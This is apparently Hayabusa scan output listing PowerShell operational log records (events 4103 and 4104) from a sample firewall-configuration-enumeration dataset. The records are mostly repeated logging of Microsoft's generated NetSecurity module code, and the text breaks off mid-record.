configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetFirewallRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""Enable-NetFirewallRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetFirewallRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetConSecRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if 
($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = 
Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultVa",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,lue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = 
$false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 
'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = Microsoft.PowerShell.,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
